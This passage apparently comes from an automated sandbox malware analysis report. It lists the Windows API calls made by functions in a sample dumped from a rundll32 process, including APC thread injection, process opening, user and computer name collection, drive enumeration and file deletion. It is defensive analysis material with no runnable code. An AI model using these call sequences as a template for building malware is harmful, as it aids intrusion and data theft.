                              • Opcode ID: a7f562729cdd024f333cdca04f574b029689deda20a01116ae96a8ef8fe5cb3d
                              • Instruction ID: d66788c1938432c53bd6b7602d2ea13992a24a945a168627898b1f78e3d50675
                              • Opcode Fuzzy Hash: a7f562729cdd024f333cdca04f574b029689deda20a01116ae96a8ef8fe5cb3d
                              • Instruction Fuzzy Hash: 9B119171A14202AFDB55DB58DC81EB97BAEEF88315F100169F6029B341DBB5AD108F54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,0595A324,00000018,05946FFC,05F38E36,?,05946FFC,05F38E36,?,05946FFC,05F38E36,?,?,?,?,05946FFC), ref: 05942CB2
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 61772565536657cd676b1c88babeb19e640182398d18db0f4a7b5e396da6fcea
                              • Instruction ID: beba672639f4852077f6c53e231caad83847d2b2d67c90c4379d15ab0eda380d
                              • Opcode Fuzzy Hash: 61772565536657cd676b1c88babeb19e640182398d18db0f4a7b5e396da6fcea
                              • Instruction Fuzzy Hash: 5811BE75628305ABCB10DF55EC47CA5BFA9FB84267B448366FB098B250DE306930CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 05937100
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                                • Part of subcall function 0593EE04: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0593EE2A
                                • Part of subcall function 0593EE04: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0593EE36
                                • Part of subcall function 0593EE04: GetModuleHandleA.KERNEL32(?,05F3978E,00000000,?,00000000), ref: 0593EE56
                                • Part of subcall function 0593EE04: GetProcAddress.KERNEL32(00000000), ref: 0593EE5D
                                • Part of subcall function 0593EE04: Thread32First.KERNEL32(?,0000001C), ref: 0593EE6D
                                • Part of subcall function 0593EE04: CloseHandle.KERNEL32(?), ref: 0593EEB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: 7a6f991aa716eb853eddb1f93fff4e0a7ff2e6004c923d8b314e6b38907270d1
                              • Instruction ID: b8e7bdf86ceb294c2a2c1378d5992ec5f43581e7d7cf706d5a0111a891262a6f
                              • Opcode Fuzzy Hash: 7a6f991aa716eb853eddb1f93fff4e0a7ff2e6004c923d8b314e6b38907270d1
                              • Instruction Fuzzy Hash: 69016DB2628208FF9B11DBA9DD8ACAFBBECEF896557000155F505A3100DF75AE14D7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05951ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                                • Part of subcall function 05951ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                                • Part of subcall function 05951ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                                • Part of subcall function 05951ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,059404AC,0594C384,00000000,00000000), ref: 059515F0
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934975
                                • Part of subcall function 05934963: StrChrA.SHLWAPI(?,00000020,?,00000000,059370EB,00000000,?,00000000,?,?,?,?,?,?), ref: 05934984
                                • Part of subcall function 05933172: lstrlen.KERNEL32(059343C6,00000000,?,?,?,?,059343C6,00000035,00000000,?,00000000), ref: 059331A2
                                • Part of subcall function 05933172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 059331B8
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,059343C6,00000000,?,?,059343C6,00000035,00000000), ref: 059331EE
                                • Part of subcall function 05933172: memcpy.NTDLL(00000010,00000000,00000035,?,?,059343C6,00000035), ref: 05933209
                                • Part of subcall function 05933172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 05933227
                                • Part of subcall function 05933172: GetLastError.KERNEL32(?,?,059343C6,00000035), ref: 05933231
                                • Part of subcall function 05933172: HeapFree.KERNEL32(00000000,00000000,?,?,059343C6,00000035), ref: 05933254
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: bdc6bffd8cf1301739fd84aa4b3b5e77ac2a1316ad325474a693d2db2bf73a8e
                              • Instruction ID: 2dd6f755ab19de1865b00bd329508abd5c02f0490349e7cccdcc58765108ea2d
                              • Opcode Fuzzy Hash: bdc6bffd8cf1301739fd84aa4b3b5e77ac2a1316ad325474a693d2db2bf73a8e
                              • Instruction Fuzzy Hash: A4018C31624204FBDB11D7A8CD0AF9EBBACAB49610F000154BA41A6180DA70AA11D7A4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memset.NTDLL ref: 05944855
                                • Part of subcall function 0594A451: memset.NTDLL ref: 0594A477
                                • Part of subcall function 0594A451: memcpy.NTDLL ref: 0594A49F
                                • Part of subcall function 0594A451: GetLastError.KERNEL32(00000010,00000218,0595386D,00000100,?,00000318,00000008), ref: 0594A4B6
                                • Part of subcall function 0594A451: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0595386D,00000100), ref: 0594A599
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: c7def099805fbea0a232b0fbe7c935fd5206eb70234414c3d6e3f626be237da0
                              • Instruction ID: c23b435f5bf9f07bfe278a0adb553cf06ab32ec702d8d8c3ad5f2f001b056c8a
                              • Opcode Fuzzy Hash: c7def099805fbea0a232b0fbe7c935fd5206eb70234414c3d6e3f626be237da0
                              • Instruction Fuzzy Hash: E701FD706013586BCB21DF29D808F9A3BECBF84214F008429F84886380D774ED048FA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 059373F5
                                • Part of subcall function 05936261: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 059362A8
                                • Part of subcall function 05936261: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 059362BE
                                • Part of subcall function 05936261: RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05936307
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Open$Closememset
                              • String ID:
                              • API String ID: 1685373161-0
                              • Opcode ID: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                              • Instruction ID: 1c0592f9e5a5c8f4ab2cd85825f13d98e91c15261f25fe97c864986cfc8fcfbe
                              • Opcode Fuzzy Hash: eae4752445d7aaf48354e339488d86f7a0e057409763ad57a1612276153bc34b
                              • Instruction Fuzzy Hash: 33E0EC34240108B7DB10AE94D85AF997F59EB44754F108015FE08AA241DA71FA60C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,059560E0,0000002C,059490D3,05F38E36,?,00000000,0594A484,?,00000318), ref: 05951EB7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeVirtual
                              • String ID:
                              • API String ID: 1263568516-0
                              • Opcode ID: d59f1ec9c0857b83f1e12c6042ea229ef6f574001815da7ac6302ec55344cd9f
                              • Instruction ID: 4e5de22e4e22b052e8a6e55ec4db1db1548ea7217ad75ce5b81aa983926b3904
                              • Opcode Fuzzy Hash: d59f1ec9c0857b83f1e12c6042ea229ef6f574001815da7ac6302ec55344cd9f
                              • Instruction Fuzzy Hash: 36D01731E00219DBCB20DFA4DC4AA9EFB70BF08720F608224E86473190C7301965CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                                • Part of subcall function 059421B6: ExpandEnvironmentStringsW.KERNEL32(0593AEB5,00000000,00000000,00000001,00000000,00000000,0593E448,0593AEB5,00000000,0593E448,?), ref: 059421CD
                                • Part of subcall function 059421B6: ExpandEnvironmentStringsW.KERNEL32(0593AEB5,00000000,00000000,00000000), ref: 059421E7
                              • lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0594BB1D
                              • lstrlenW.KERNEL32(?,?,00000000), ref: 0594BB29
                              • memset.NTDLL ref: 0594BB71
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BB8C
                              • lstrlenW.KERNEL32(0000002C), ref: 0594BBC4
                              • lstrlenW.KERNEL32(?), ref: 0594BBCC
                              • memset.NTDLL ref: 0594BBEF
                              • wcscpy.NTDLL ref: 0594BC01
                              • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0594BC27
                              • RtlEnterCriticalSection.NTDLL(?), ref: 0594BC5D
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0594BC79
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0594BC92
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594BCA4
                              • FindClose.KERNEL32(?), ref: 0594BCB9
                              • FindFirstFileW.KERNEL32(00000000,00000000), ref: 0594BCCD
                              • lstrlenW.KERNEL32(0000002C), ref: 0594BCEF
                              • FindNextFileW.KERNEL32(?,00000000), ref: 0594BD65
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0594BD77
                              • FindClose.KERNEL32(?), ref: 0594BD92
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                              • String ID:
                              • API String ID: 2962561936-0
                              • Opcode ID: 34d08c74ea850f0037f48eb3de087eec9022704b586684c4faf070619519f726
                              • Instruction ID: a97c0e2efd49746f72fc56d0c2e158f1e9537f587cb78c01411eb47eb6783d60
                              • Opcode Fuzzy Hash: 34d08c74ea850f0037f48eb3de087eec9022704b586684c4faf070619519f726
                              • Instruction Fuzzy Hash: 90814AB1608345AFDB10AF28DC89F1ABBEAFF88305F404929F58696252DB74DC15CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 059310FA
                              • GetLastError.KERNEL32 ref: 05931108
                              • NtSetInformationProcess.NTDLL ref: 05931162
                              • GetProcAddress.KERNEL32(?,00000000), ref: 059311A1
                              • GetProcAddress.KERNEL32(?), ref: 059311C2
                              • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 05931219
                              • CloseHandle.KERNEL32(?), ref: 0593122F
                              • CloseHandle.KERNEL32(?), ref: 05931255
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                              • String ID: v
                              • API String ID: 3529370251-1801730948
                              • Opcode ID: 132501bd6e3e87db5744b4090922bb2c14a61583a425b8aa0287f48e0dda37f6
                              • Instruction ID: c508baa68133049318c0316f57fc26d4e820d2d11ce68efa7bd1fe4c15f3ff8c
                              • Opcode Fuzzy Hash: 132501bd6e3e87db5744b4090922bb2c14a61583a425b8aa0287f48e0dda37f6
                              • Instruction Fuzzy Hash: 8A418671118345EFD701DF60D98AA6BBBF9FB88308F000A29F589D2120EB709A59DB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B270
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B2A2
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B2D4
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B306
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B338
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B36A
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B39C
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B3CE
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,76CDF710,00000000,00000000), ref: 0593B400
                              • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B593
                              • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B637
                                • Part of subcall function 05947736: RtlAllocateHeap.NTDLL ref: 05947777
                                • Part of subcall function 05947736: memset.NTDLL ref: 0594778B
                                • Part of subcall function 05947736: GetCurrentThreadId.KERNEL32 ref: 05947818
                                • Part of subcall function 05947736: GetCurrentThread.KERNEL32 ref: 0594782B
                                • Part of subcall function 05936537: RtlEnterCriticalSection.NTDLL(05F3C2D0), ref: 05936540
                                • Part of subcall function 05936537: HeapFree.KERNEL32(00000000,?), ref: 05936572
                                • Part of subcall function 05936537: RtlLeaveCriticalSection.NTDLL(05F3C2D0), ref: 05936590
                              • HeapFree.KERNEL32(00000000,?,?,?,?,76CDF710,00000000,00000000), ref: 0593B5DF
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                              • String ID:
                              • API String ID: 3296958911-0
                              • Opcode ID: 020e81efb0b33d6d8ee35ffea50c10de5f399cbf267c93e4485c8d310f220a72
                              • Instruction ID: 4c5326dba359d5c979502304fcfd83d3c1b6c72e46e616979114e56382496c2c
                              • Opcode Fuzzy Hash: 020e81efb0b33d6d8ee35ffea50c10de5f399cbf267c93e4485c8d310f220a72
                              • Instruction Fuzzy Hash: 04F193B1B28355EBCB10EBB4D98BD2F7BDEEB482507554A24E506DB200DF30ED518B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • wcscpy.NTDLL ref: 0593FD7B
                              • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0593FD87
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0593FD98
                              • memset.NTDLL ref: 0593FDB5
                              • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0593FDC3
                              • WaitForSingleObject.KERNEL32(00000000), ref: 0593FDD1
                              • GetDriveTypeW.KERNEL32(?), ref: 0593FDDF
                              • lstrlenW.KERNEL32(?), ref: 0593FDEB
                              • wcscpy.NTDLL ref: 0593FDFD
                              • lstrlenW.KERNEL32(?), ref: 0593FE17
                              • HeapFree.KERNEL32(00000000,?), ref: 0593FE30
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                              • String ID:
                              • API String ID: 3888849384-0
                              • Opcode ID: a123c214412fd131dd6324b6ba6935cdcd6e498a800c63216dbad163dd36bb84
                              • Instruction ID: 1dffe95f07142ab9868b414b61ea8aa6370e7e8cb4f994b1fecce42b19578dbd
                              • Opcode Fuzzy Hash: a123c214412fd131dd6324b6ba6935cdcd6e498a800c63216dbad163dd36bb84
                              • Instruction Fuzzy Hash: 9D312D71C14208FFDB119FA4DD89CAEBFBDEB08314B114426F505E2111EB35AE699B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0593EE2A
                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0593EE36
                              • GetModuleHandleA.KERNEL32(?,05F3978E,00000000,?,00000000), ref: 0593EE56
                              • GetProcAddress.KERNEL32(00000000), ref: 0593EE5D
                              • Thread32First.KERNEL32(?,0000001C), ref: 0593EE6D
                              • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0593EE88
                              • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0593EE99
                              • CloseHandle.KERNEL32(00000000), ref: 0593EEA0
                              • Thread32Next.KERNEL32(?,0000001C), ref: 0593EEA9
                              • CloseHandle.KERNEL32(?), ref: 0593EEB5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                              • String ID:
                              • API String ID: 2341152533-0
                              • Opcode ID: 5a1064067788ff4a6bc54f194a1bcf082e0a43277645b77543075afdd1d1b62d
                              • Instruction ID: 8b9c049fc4512b1a44ac18464ebb4b076bd5ef5eac44c4c1c8dce3f7d683cb5d
                              • Opcode Fuzzy Hash: 5a1064067788ff4a6bc54f194a1bcf082e0a43277645b77543075afdd1d1b62d
                              • Instruction Fuzzy Hash: A2218C72904208EFDF11AFE0DC8ACAEBFBDFB48355B004129F601A6150DB309D65CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0593EC1B
                              • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0593ECD3
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593EC69
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0593EC82
                              • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0593ECA1
                              • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0593ECB3
                              • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0593ECBB
                              Strings
                              • Software\Microsoft\WAB\DLLPath, xrefs: 0593EC0C
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                              • String ID: Software\Microsoft\WAB\DLLPath
                              • API String ID: 1628847533-3156921957
                              • Opcode ID: 4016a73e7ecf8aabd789bf9c59988572914690e3d534a6e9cb712ac3f8b807a0
                              • Instruction ID: 9254409ff521088b9bf18c9a056f2562e9d19b59e1bda76d166d6c6381d1a964
                              • Opcode Fuzzy Hash: 4016a73e7ecf8aabd789bf9c59988572914690e3d534a6e9cb712ac3f8b807a0
                              • Instruction Fuzzy Hash: 9421C475904618FFDB11EFA8DD8ACAEBF7EFB84250B110161F802A3220EB315E51CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,05932028,?), ref: 0593867A
                                • Part of subcall function 05938669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,05932028,?), ref: 05938697
                              • FreeLibrary.KERNEL32(?), ref: 059366F8
                                • Part of subcall function 0594AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,0593663D,?,?), ref: 0594AFCF
                                • Part of subcall function 0594AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0593663D,?,?), ref: 0594AFF8
                                • Part of subcall function 0594AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0594B018
                                • Part of subcall function 0594AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 0594B034
                                • Part of subcall function 0594AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B040
                                • Part of subcall function 0594AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0593663D,?,?), ref: 0594B043
                                • Part of subcall function 0594AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0593663D,?,?), ref: 0594B04F
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B06C
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B086
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B09C
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0B2
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0C8
                                • Part of subcall function 0594AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 0594B0DE
                              • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0593664E
                              • lstrlenW.KERNEL32(?), ref: 0593666A
                              • lstrlenW.KERNEL32(?), ref: 05936682
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpyW.KERNEL32(00000000,?), ref: 0593669B
                              • lstrcpyW.KERNEL32(00000002), ref: 059366B0
                                • Part of subcall function 05951C9B: lstrlenW.KERNEL32(?,00000000,76CC8250,76C869A0,?,?,?,059366C0,?,00000000,?), ref: 05951CAB
                                • Part of subcall function 05951C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,059366C0,?,00000000,?), ref: 05951CCD
                                • Part of subcall function 05951C9B: lstrcpyW.KERNEL32(00000000,?), ref: 05951CF9
                                • Part of subcall function 05951C9B: lstrcatW.KERNEL32(00000000,?), ref: 05951D0C
                              • FindNextFileW.KERNEL32(?,00000010), ref: 059366D8
                              • FindClose.KERNEL32(00000002), ref: 059366E6
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                              • String ID:
                              • API String ID: 1209511739-0
                              • Opcode ID: 77385404194e039dbcb27103e1ae2aa5e5522f4898883ec8dc9e611b18b92272
                              • Instruction ID: adf42393f87bf3af521e66a8ed7cdc9168a83ce944dc775b8951462d16456fd5
                              • Opcode Fuzzy Hash: 77385404194e039dbcb27103e1ae2aa5e5522f4898883ec8dc9e611b18b92272
                              • Instruction Fuzzy Hash: 0C414971508306EBC711EF60D94AA2FBBEDFB84B48F040929F485D2150DB35D918CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 059516F0
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05951703
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 05951715
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,05946C8E), ref: 05951739
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 05951747
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 0595175E
                              • GetComputerNameW.KERNEL32(00000000,?), ref: 0595176F
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,05946C8E), ref: 05951795
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID:
                              • API String ID: 3239747167-0
                              • Opcode ID: d32891ad288cd374d255803cdcafd97e0da8e41ec2a33150790548dddfcc3f15
                              • Instruction ID: ce316eebd30535fb12ac47eace7c22d3a61b00aee4bc57fffbf06b18f098d3c0
                              • Opcode Fuzzy Hash: d32891ad288cd374d255803cdcafd97e0da8e41ec2a33150790548dddfcc3f15
                              • Instruction Fuzzy Hash: 93312BB6A14209EFDB00DFB4DD8586EBBFEFB482507158469E905D3200EB30AE64DB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000), ref: 059399D4
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05939A3D
                              • lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 05939A65
                              • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 05939AB7
                              • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 05939AC2
                              • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 05939AD5
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                              • String ID:
